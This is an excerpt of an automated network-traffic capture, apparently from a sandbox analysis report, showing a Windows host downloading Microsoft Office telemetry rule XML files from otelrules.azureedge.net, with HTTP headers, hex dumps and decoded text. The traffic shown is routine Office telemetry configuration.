                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            124192.168.2.44974413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                            x-ms-request-id: ce5acca4-c01e-002b-2c1e-366e00000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120245Z-1749fc9bdbdlzhmchC1DFWe68s00000002ag000000007xuk
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            125192.168.2.41678913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:45 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                            x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120245Z-16547b76f7fx6rhxhC1DFW76kg0000000kq0000000000qfp
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            126192.168.2.44149113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                            x-ms-request-id: 370a5c86-201e-000c-6871-3579c4000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-1749fc9bdbddrtrhhC1DFWsq8000000002ng0000000022au
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            127192.168.2.45011013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                            x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-16547b76f7fmbrhqhC1DFWkds80000000khg00000000dfbn
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            128192.168.2.44974713.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                            x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-16547b76f7fx6rhxhC1DFW76kg0000000kgg00000000bdnf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            129192.168.2.46392513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                            x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-16547b76f7fxsvjdhC1DFWprrs0000000kgg000000007ygy
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            130192.168.2.44975013.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                            x-ms-request-id: 0a22c1bd-101e-000b-3cfe-355e5c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-1749fc9bdbd4dqj6hC1DFWr4n400000002kg000000003d2q
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            131192.168.2.41326013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:46 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                            x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120246Z-16547b76f7fj5p7mhC1DFWf8w40000000kn000000000cmdd
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            132192.168.2.42167713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:47 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                            x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120247Z-16547b76f7f7scqbhC1DFW0m5w0000000kk0000000000m5b
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
